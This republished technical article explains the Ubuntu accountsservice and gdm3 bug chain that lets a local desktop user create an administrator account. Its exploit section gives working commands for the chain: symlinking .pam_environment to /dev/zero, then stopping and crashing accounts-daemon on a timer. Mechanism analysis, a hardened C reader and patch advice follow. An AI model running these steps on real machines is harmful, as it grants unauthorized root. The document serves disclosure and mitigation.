Create a New sudo User and Gain Root on Ubuntu Without a Password – Full Exploit Guide

This article explains a pair of Ubuntu bugs, one in accounts-daemon (the accountsservice package) and one in GNOME Display Manager (gdm3), that together let an ordinary local user with a desktop session create a new administrator account and so obtain root through sudo without knowing any existing password. It walks through the exploitation steps and the commands involved, explains the underlying flaws in accounts-daemon and gdm3, and gives mitigation advice.

ITPUB

Exploit Procedure

In a terminal, from your home directory, create a symbolic link named .pam_environment that points to /dev/zero. If a real .pam_environment already exists, rename it first so it can be restored afterwards:

ln -s /dev/zero .pam_environment

Open Settings → Region & Language and change the language. The dialog freezes: the language change makes accounts-daemon read ~/.pam_environment on your behalf, and because /dev/zero never returns end-of-file, the daemon never finishes.

Back in the terminal, delete the symlink straight away. If it is still in place when accounts-daemon is later restarted, the daemon hangs again and you can lock yourself out of the original account:

rm .pam_environment

Find the PID of the hung daemon. It is pinned at 100 % CPU, so it sits at the top of top; pidof returns it directly (597 in this example, yours will differ):

pidof accounts-daemon

Stop the daemon so that it stops burning CPU and stays in its current state. An unprivileged user cannot normally signal a root-owned daemon; this works only because accounts-daemon dropped its privileges to your user before reading your file and is still running under your identity:

kill -SIGSTOP 597

Schedule the crash for after you have logged out. A SIGSEGV sent to a stopped process stays pending until the process is continued, so the SIGCONT that follows is what actually lets the crash happen. nohup keeps the timer alive once the session ends, and 30 seconds is enough for the logout and for gdm3 to come back up:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597" &

Log out. When the timer fires, accounts-daemon dies; gdm3's query to it for the list of accounts fails, gdm3 treats the failure as "no users exist", and it launches gnome-initial-setup, the first-boot wizard. The wizard insists on creating a user and makes that user an administrator (a member of the sudo group), so the new account can run sudo with the password you chose for it, without ever knowing the existing administrator's password.

Vulnerability Mechanism

accounts-daemon bug: Ubuntu ships accountsservice (the package behind the accounts-daemon process) with a distribution patch that adds a function, is_in_pam_environment, which opens .pam_environment in the user's home directory and reads it line by line until end-of-file. The daemon follows symlinks, so the user can point that name at /dev/zero, which returns an endless stream of zero bytes and never reaches EOF: the read loop spins forever at 100 % CPU. On its own this is a denial of service. What turns it into a building block for escalation is a second detail: to avoid being tricked into reading root-only files through a user's symlink, the daemon deliberately drops its privileges to the user's identity before reading the file, and it is still running as that user while it spins. That is what allows an unprivileged user to send it SIGSTOP and SIGSEGV, which the kernel would otherwise refuse against a root-owned process.

gdm3 bug: before showing the login screen, the GNOME Display Manager (gdm3) asks accounts-daemon over D-Bus how many user accounts exist, to decide whether to run gnome-initial-setup (the first-boot wizard that creates the machine's first, administrative account) or the ordinary login screen. When that query fails, because the stopped daemon never answers and the call times out, or because the daemon has just been crashed with SIGSEGV, gdm3 treats the error as "zero users" rather than as an error and launches gnome-initial-setup. Neither bug is an escalation by itself: the accountsservice bug is a hang plus the ability to signal a root daemon, and the gdm3 bug needs the daemon to be unavailable at exactly the moment gdm3 asks. Chained, they let any local user with a GNOME session create an administrator account, and therefore run sudo, without knowing any existing password.
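The read loop described above, as an added example that is not accountsservice's own code: a small C reader for ~/.pam_environment written in the vulnerable shape the page describes, next to a hardened version that refuses symlinks and non-regular files and bounds how much it reads. The scratch file paths, the size and line caps, and the function names are assumptions for the demo, and the hardened variant is one reasonable fix, not necessarily the exact patch Ubuntu shipped.

```c
/* Added illustration, not accountsservice's real source: a line-reader that
 * looks for "KEY=" in a user-controlled ~/.pam_environment, written in the
 * shape the page describes, beside a hardened version that refuses anything
 * but a small regular file. Paths, constants and names here are assumptions. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

#define PAM_ENV_MAX_BYTES (64 * 1024) /* assumed cap; a real file is a few lines */
#define PAM_ENV_MAX_LINES 256         /* bounds the loop even if the file grows */
#define LINE_BUF 4096

/* True if the line starts with "<key>=". */
static int line_has_key(const char *line, const char *key)
{
    size_t n = strlen(key);
    return strncmp(line, key, n) == 0 && line[n] == '=';
}

/* Vulnerable shape: fopen() follows a symlink, and the loop ends only at EOF.
 * On /dev/zero fgets() keeps returning buffers of NUL bytes, EOF never comes,
 * and the caller spins at 100 % CPU. Returns 1 if found, 0 otherwise. */
int is_in_pam_environment_vulnerable(const char *path, const char *key)
{
    char line[LINE_BUF];
    int found = 0;
    FILE *fp = fopen(path, "r");
    if (fp == NULL) return 0;
    while (fgets(line, sizeof line, fp) != NULL) { /* never NULL on /dev/zero */
        if (line_has_key(line, key)) { found = 1; break; }
    }
    fclose(fp);
    return found;
}

/* Hardened: refuse symlinks (O_NOFOLLOW), never block on a FIFO planted in
 * $HOME (O_NONBLOCK), insist on a regular file of sane size, and bound the
 * lines scanned. Returns 1 if found, 0 if absent or no file, -1 if refused. */
int is_in_pam_environment_hardened(const char *path, const char *key)
{
    char line[LINE_BUF];
    struct stat st;
    int found = 0;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0) return errno == ENOENT ? 0 : -1; /* ELOOP: symlink refused */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_size > PAM_ENV_MAX_BYTES) {
        close(fd);
        return -1;
    }
    FILE *fp = fdopen(fd, "r");
    if (fp == NULL) { close(fd); return -1; }
    for (int i = 0; i < PAM_ENV_MAX_LINES && fgets(line, sizeof line, fp) != NULL; i++) {
        if (line_has_key(line, key)) { found = 1; break; }
    }
    fclose(fp);
    return found;
}

/* Demo helpers: write a constructed fixture, or replace a path with a symlink. */
int write_fixture(const char *path, const char *text)
{
    unlink(path);
    FILE *fp = fopen(path, "w");
    if (fp == NULL) return -1;
    size_t n = strlen(text);
    int ok = fwrite(text, 1, n, fp) == n;
    return (fclose(fp) == 0 && ok) ? 0 : -1;
}

int make_symlink(const char *target, const char *path)
{
    unlink(path);
    return symlink(target, path);
}

int main(void)
{
    const char *reg = "/tmp/pam_env_demo_regular"; /* assumed scratch paths */
    const char *lnk = "/tmp/pam_env_demo_link";
    write_fixture(reg, "LANG=en_GB.UTF-8\nLC_TIME=C\n");   /* constructed sample */
    make_symlink("/dev/zero", lnk);                         /* what the exploit plants */
    printf("regular file, LANG: vulnerable=%d hardened=%d\n",
           is_in_pam_environment_vulnerable(reg, "LANG"),
           is_in_pam_environment_hardened(reg, "LANG"));
    printf("symlink to /dev/zero: hardened=%d (the vulnerable reader would spin)\n",
           is_in_pam_environment_hardened(lnk, "LANG"));
    unlink(reg); unlink(lnk);
    return 0;
}
```

The vulnerable reader is only ever invoked on the regular fixture, because on the /dev/zero symlink it would not return. O_NOFOLLOW alone is not enough: a FIFO in the home directory would make a plain open() block, which is why the hardened version also passes O_NONBLOCK and checks S_ISREG after fstat(), and why it still caps the number of lines in case the file grows while it is being read.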

Mitigation

The bugs were reported to Ubuntu by GitHub Security Lab on 17 October 2020, and Ubuntu published fixed accountsservice and gdm3 packages in November 2020 (see the GitHub Security Lab write-up in the references). Apply all security updates (e.g., sudo apt update && sudo apt upgrade) as soon as possible, then reboot so that the patched gdm3 and accounts-daemon are the ones actually running. The full chain needs gdm3, so only Ubuntu desktop installations using GNOME with gdm3 are exposed to the privilege escalation; command-line-only and server installations, and desktops that do not use gdm3, are not. Update accountsservice wherever it is installed nonetheless, because the infinite-loop bug is a denial of service on its own.

References:

GitHub Security Lab research page: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE

Discussion thread: https://news.ycombinator.com/item?id=25053238

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.
